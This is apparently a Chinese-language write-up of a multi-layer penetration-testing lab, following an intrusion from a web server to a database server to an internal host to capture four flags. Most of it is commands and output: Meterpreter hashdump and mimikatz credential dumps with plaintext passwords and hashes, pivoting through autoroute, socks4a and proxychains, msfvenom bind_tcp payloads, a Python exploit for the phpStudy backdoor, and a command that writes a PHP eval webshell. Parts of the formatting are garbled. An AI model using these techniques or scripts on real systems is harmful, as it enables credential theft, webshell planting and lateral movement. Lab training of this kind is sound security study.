x86 0 NT AUTHORITY\SYSTEM C:\Windows\SysWOW64\notepad.exe3048 2596 s.exe x86 0 IIS APPPOOL\newcc123 c:\windows\debug\WIA\s.exe3076 2804 360zipUpdate.exe x86 1 WIN-KALKEMT3JMA\Administrator C:\Program Files (x86)\360\360zip\360zipUpdate.exe3320 3300 notepad.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\SysWOW64\notepad.exe3824 2480 notepad.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\SysWOW64\notepad.exe3932 2732 notepad.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\SysWOW64\notepad.exe
使用 migrate命令迁移进程(最好迁移到system权限)
meterpreter > migrate 1560
[*] Migrating from 2964 to 1560...
[*] Migration completed successfully.
获取哈希 run hashdump
meterpreter > run hashdump [!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 20401422a21274279449907862e9d520...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints... No users with password hints on this system [*] Dumping password hashes... Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c933df09b600efabee0791aaccc43f2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
MySQL_HWS:1001:aad3b435b51404eeaad3b435b51404ee:6a75a75e4cfd3cf00faf743e17e90a53:::
PhpMyAdmin_HWS:1002:aad3b435b51404eeaad3b435b51404ee:a14b615c584d6b043f42f1cfab9779cd:::
huweishen542147:1004:aad3b435b51404eeaad3b435b51404ee:c76eea2615348c5228f7027d3ccab02d:::
cc123:1005:aad3b435b51404eeaad3b435b51404ee:afdeb425b4a55982deb4e80fa3387576:::
newcc123:1007:aad3b435b51404eeaad3b435b51404ee:97824315153b4dd665d6c688f446ebf1:::
ww2cc123:1008:aad3b435b51404eeaad3b435b51404ee:adadf2dd832421c26a96705fd09a32bd:::
使用 load mimikatz 加载mimikatz
mimikatz_command -f samdump::hashes
meterpreter > mimikatz_command -f samdump::hashes
Ordinateur : WIN-KALKEMT3JMA
BootKey : 20401422a21274279449907862e9d520Rid : 500
User : Administrator
LM :
NTLM : 1c933df09b600efabee0791aaccc43f2Rid : 501
User : Guest
LM :
NTLM : Rid : 1001
User : MySQL_HWS
LM :
NTLM : 6a75a75e4cfd3cf00faf743e17e90a53Rid : 1002
User : PhpMyAdmin_HWS
LM :
NTLM : a14b615c584d6b043f42f1cfab9779cdRid : 1004
User : huweishen542147
LM :
NTLM : c76eea2615348c5228f7027d3ccab02dRid : 1005
User : cc123
LM :
NTLM : afdeb425b4a55982deb4e80fa3387576Rid : 1007
User : newcc123
LM :
NTLM : 97824315153b4dd665d6c688f446ebf1Rid : 1008
User : ww2cc123
LM :
NTLM : adadf2dd832421c26a96705fd09a32bd
搜索命令 mimikatz_command -f sekurlsa::searchPasswords
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { MySQL_HWS ; WIN-KALKEMT3JMA ; 5f00480068003800400069004f0077004000400054007300370059004b007100640057004a00320009ff57004a00320077006d005400610046002800 }
[1] { Administrator ; WIN-KALKEMT3JMA ; !@#Qwe123. }
[2] { newcc123 ; WIN-KALKEMT3JMA ; ZtKGmDj0qEbDECSBl5p }
[3] { cc123 ; WIN-KALKEMT3JMA ; Ht6_ifp6nvkjn }
[4] { newcc123 ; WIN-KALKEMT3JMA ; ZtKGmDj0qEbDECSBl5p }
[5] { WIN-KALKEMT3JMA ; Administrator ; !@#Qwe123. }
[6] { WIN-KALKEMT3JMA ; newcc123 ; ZtKGmDj0qEbDECSBl5p }
[7] { MySQL_HWS ; WIN-KALKEMT3JMA ; 5f00480068003800400069004f0077004000400054007300370059004b007100640057004a00320009ff57004a00320077006d005400610046002800 }
[8] { WIN-KALKEMT3JMA ; MySQL_HWS ; 5f00480068003800400069004f0077004000400054007300370059004b007100640057004a00320009ff57004a00320077006d005400610046002800 }
[9] { Administrator ; WIN-KALKEMT3JMA ; !@#Qwe123. }
[10] { WIN-KALKEMT3JMA ; cc123 ; Ht6_ifp6nvkjn }
[11] { cc123 ; WIN-KALKEMT3JMA ; Ht6_ifp6nvkjn }使用 wdigest 或 tspkg (整理)
meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================AuthID Package Domain User Password
------ ------- ------ ---- --------
0;545476 Negotiate IIS APPPOOL DefaultAppPool
0;996 Negotiate WORKGROUP WIN-KALKEMT3JMA$
0;2137231 Negotiate IIS APPPOOL cc123
0;1319987 Negotiate IIS APPPOOL ww2cc123
0;618915 Negotiate IIS APPPOOL newcc123
0;995 Negotiate NT AUTHORITY IUSR
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;47995 NTLM
0;999 NTLM WORKGROUP WIN-KALKEMT3JMA$
0;325854 NTLM WIN-KALKEMT3JMA Administrator !@#Qwe123.
0;110599 NTLM WIN-KALKEMT3JMA MySQL_HWS 5f 00 48 00 68 00 38 00 40 00 69 00 4f 00 77 00 40 00 40 00 54 00 73 00 37 00 59 00 4b 00 71 00 64 00 57 00 4a 00 32 00 09 ff 57 00 4a 00 32 00 77 00 6d 00 54 00 61 00 46 00 28 00
0;2142507 NTLM WIN-KALKEMT3JMA cc123 Ht6_ifp6nvkjn
0;623301 NTLM WIN-KALKEMT3JMA newcc123 ZtKGmDj0qEbDECSBl5pmeterpreter > tspkg
[+] Running as SYSTEM
[*] Retrieving tspkg credentials
tspkg credentials
=================AuthID Package Domain User Password
------ ------- ------ ---- --------
0;545476 Negotiate IIS APPPOOL DefaultAppPool
0;996 Negotiate WORKGROUP WIN-KALKEMT3JMA$
0;2137231 Negotiate IIS APPPOOL cc123
0;1319987 Negotiate IIS APPPOOL ww2cc123
0;618915 Negotiate IIS APPPOOL newcc123
0;995 Negotiate NT AUTHORITY IUSR
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;47995 NTLM
0;999 NTLM WORKGROUP WIN-KALKEMT3JMA$
0;325854 NTLM WIN-KALKEMT3JMA Administrator !@#Qwe123.
0;110599 NTLM WIN-KALKEMT3JMA MySQL_HWS 5f 00 48 00 68 00 38 00 40 00 69 00 4f 00 77 00 40 00 40 00 54 00 73 00 37 00 59 00 4b 00 71 00 64 00 57 00 4a 00 32 00 09 ff 57 00 4a 00 32 00 77 00 6d 00 54 00 61 00 46 00 28 00
0;2142507 NTLM WIN-KALKEMT3JMA cc123 Ht6_ifp6nvkjn
0;623301 NTLM WIN-KALKEMT3JMA newcc123 ZtKGmDj0qEbDECSBl5p
获得超级管理员的账号密码
Administrator !@#Qwe123.
二.内网渗透
1. 数据库服务器
1)添加路由及代理
web服务器
192.168.0.134
10.10.10.135
添加路由
run autoroute -s 10.10.10.0/24
查看路由
run autoroute -p
使用 auxiliary/server/socks4a 代理模块
msf5 exploit(windows/local/ms16_075_reflection_juicy) > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > optionsModule options (auxiliary/server/socks4a):Name Current Setting Required Description---- --------------- -------- -----------SRVHOST 0.0.0.0 yes The address to listen onSRVPORT 1080 yes The port to listen on.Auxiliary action:Name Description---- -----------Proxy msf5 auxiliary(server/socks4a) > set SRVPORT 2222
SRVPORT => 2222
msf5 auxiliary(server/socks4a) > run
[*] Auxiliary module running as background job 0.[*] Starting the socks4a proxy server修改配置文件
使用proxychains 和 nmap 进行内网扫描
proxychains nmap -sT -Pn 10.10.10.0/24
//扫描网段
proxychains nmap -sT -Pn 10.10.10.136
//扫描单个IP
之前的 os-shell cookie 过期
重新获取cookie
填入新cookie 获取shell
2) 正向连接进入10.10.10.0/24网段
生成一个正向攻击载荷
msfvenom -p windows/meterpreter/bind_tcp LPORT=13777 -f exe > bind.exe
利用之前的大马 连接数据库上传文件
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-b8bqcBB9-1654765417602)(.\ff.assets\image-20210720174624683.png)]
执行文件
设置监听,远程主动连接,建立会话(只能正向主动,无法反弹shell,因为无法访问,除非建立隧道)
rhost 为远程连接服务器IP lport 为监听端口
msf5 auxiliary(server/socks4a) > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf5 exploit(multi/handler) > optionsModule options (exploit/multi/handler):Name Current Setting Required Description---- --------------- -------- -----------Payload options (windows/meterpreter/bind_tcp):Name Current Setting Required Description---- --------------- -------- -----------EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)LPORT 12345 yes The listen portRHOST no The target addressExploit target:Id Name-- ----0 Wildcard Targetmsf5 exploit(multi/handler) > set rhost 10.10.10.136
rhost => 10.10.10.136
msf5 exploit(multi/handler) > set lport 13777
lport => 13777
msf5 exploit(multi/handler) > run[*] Started bind TCP handler against 10.10.10.136:13777
[*] Sending stage (176195 bytes) to 10.10.10.136
[*] Meterpreter session 3 opened (10.10.10.135:51227 -> 10.10.10.136:13777) at 2021-07-20 05:50:36 -0400
连接成功已经是system权限
查看网卡信息
数据库服务器
10.10.10.136
10.10.1.128
3) 破解哈希
进程迁移
加载mimikatz
获取哈希 run hashdump
获取哈希 mimikatz_command -f samdump::hashes
获取密码 mimikatz_command -f sekurlsa::searchPasswords
[0] { Administrator ; WIN-JJU7KU45PN7 ; !@#QWEasd123. }
[1] { WIN-JJU7KU45PN7 ; Administrator ; !@#QWEasd123. }
[2] { Administrator ; WIN-JJU7KU45PN7 ; !@#QWEasd123. }
进入shell
查看数据库主机名 hostname
获取路由 run get_local_subnets
2.目标主机
1) 建立路由,内网穿刺
数据库服务器
10.10.10.136
10.10.1.128
在数据库会话 建立路由和代理 run autoroute -s 10.10.1.0/24
2) 利用proxychains 扫描内网
扫描目标主机 proxychains nmap -sT -Pn 10.10.1.129
若要扫全部则proxychains nmap -sT -Pn 10.10.1.0/24
利用proxychains 访问 10.10.1.129:80
命令 : proxychains firefox http://10.10.1.129 或者 proxychains3 firefox http://10.10.1.129
发现目标机 使用 phpstudy
3) 利用相关漏洞
百度搜索相关漏洞利用事件
phpstudy2014/2016/2018( php5.2.17/5.4.45 )一般存在后门
3.1) 编写漏洞利用工具
php代码语法:
system(‘whoami’)
eval(system(‘whoami’)😉
工具代码:
import requests
import sys
import base64
//导入模块
shell="system('"+sys.argv[1]+"');"
//shell接受第一个参数 argv[0]为文件名
shell_base64=base64.b64encode(shell.encode('utf-8'))
//对shell西安进行utf8加密,再进行base64加秘
header={'Accept-Charset':shell_base64,'Accept-Encoding':'gzip,deflate'}
//此处的'Accept-Charset'可以执行命令,设置请求头的参数
def exploit(url):html =requests.get(url=url,headers=header).text//发送请求包并获取响应内容以文本格式存入htmlreturn url;返回urlurl='http://10.10.1.129/'
//设置目标网站print(exploit(url))
//调用自定义函数,并打印返回值url在 phpstudy 目录默认 系统 权限
3.2) 使用该工具写马
写马命令 echo ^<?php @eval(\$_POST[\"shell\"])?^>>c:\phpstudy\WWW\shell.php
执行脚本命令
proxychains python3 phpstudy.py "echo ^<?php @eval(\$_POST[\"shell\"])?^>>c:\phpstudy\WWW\shell.php"//proxychains开代理 python3指定版本 py脚本 加引号为一整个参数
创建成功
3.3) 建立代理,使用菜刀连接webs hell
下载安装 sockscap
利用 sockscap 访问第三重网络
若要用物理机访问kali里的代里
proxychains.conf里应使用本地的IP而不是使用127.0.0.1
右键新增一个代理,配置(kali的)IP,端口,协议等
进行连接测试
坑四:虽然显示接收数据错误,但能正常菜刀连接webshell
直接拖拉exe至应用处
右键点击 在代理隧道中运行选中程序
然后使用操刀连接webshell
虚拟终端查看权限,已经是system
4) 在msf上建立会话
利用 菜刀上传反向连接bind.exe
运行bind.exe
方法一 : 利用 菜刀 的 虚拟终端
方法二 : 使用phpstudy.py (编写的phpstudy后门利用脚本)
proxychains python3 phpstudy.py c:/bind.exe
使用 模块
重新设置 正向连接主机(RHOST),进行正向连接
msf5 exploit(multi/handler) > optionsModule options (exploit/multi/handler):Name Current Setting Required Description---- --------------- -------- -----------Payload options (windows/meterpreter/bind_tcp):Name Current Setting Required Description---- --------------- -------- -----------EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)LPORT 13777 yes The listen portRHOST 10.10.10.136 no The target addressExploit target:Id Name-- ----0 Wildcard Targetmsf5 exploit(multi/handler) > set rhost 10.10.1.129
rhost => 10.10.1.129
msf5 exploit(multi/handler) > run[*] Started bind TCP handler against 10.10.1.129:13777
[*] Sending stage (176195 bytes) to 10.10.1.129
[*] Meterpreter session 4 opened (10.10.1.128:50355 -> 10.10.1.129:13777) at 2021-07-23 11:10:32 -0400meterpreter >
成功
进入shell shell ,查看是否还有同一网段是否还有别的主机 arp -a 以及系统信息 systeminfo 等
C:\Windows\system32>arp -a
arp -a�ӿ�: 10.10.1.129 — 0xb
Internet �� ������ ����
10.10.1.1 00-50-56-c0-00-03 ��
10.10.1.128 00-0c-29-43-9b-50 ��
10.10.1.254 00-50-56-e7-11-7f ��
10.10.1.255 ff-ff-ff-ff-ff-ff ��
224.0.0.22 01-00-5e-00-00-16 ��
224.0.0.252 01-00-5e-00-00-fc ��
255.255.255.255 ff-ff-ff-ff-ff-ff ��
5) 破解哈希
迁移进程,加载mimikatz
hashdump
mimikatz_command -f samdump::hashes
mimikatz_command -f sekurlsa::searchPasswords
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { Administrator ; TARGET ; !@#QWEasd123. }
[1] { TARGET ; Administrator ; !@#QWEasd123. }
[2] { Administrator ; TARGET ; !@#QWEasd123. }
wdigest 和 tspkg
三. 四个flag
session 权限
1 IIS APPPOOL\newcc123
2 NT AUTHORITY\SYSTEM
3 NT AUTHORITY\SYSTEM
4 NT AUTHORITY\SYSTEM
1.第一个
在第一层网络 (web服务器)
位置:
C:/HwsHostMaster/wwwroot/ww2cc123_55m39g/web/upimg/flag.txt
flag1
eeac7f42e6fe8b0bf424734bb7d3c05d//moon1
2.第二个
在 第一层网络 (因为在 超级管理员 目录中,需要先 提权)
位置:
C:/Users/Administrator/flag2.txt
a81c3d94aa192d3f87ed9f2fffec04fc
//moonsec
3.第三个
在第二层网络 (数据库服务器)
位置:
C:/Users/Administrator/root.txt.txt
6d4db5ff0c117864a02827bad3c361b9
//moon
4.第四个
在第三层网络(目标主机)
位置:
C:/Users/Administrator/root.txt.txt
63a9f0ea7bb98050796b649e85481845
//root
支付宝扫一扫
微信扫一扫
.png)
.png)
.png)
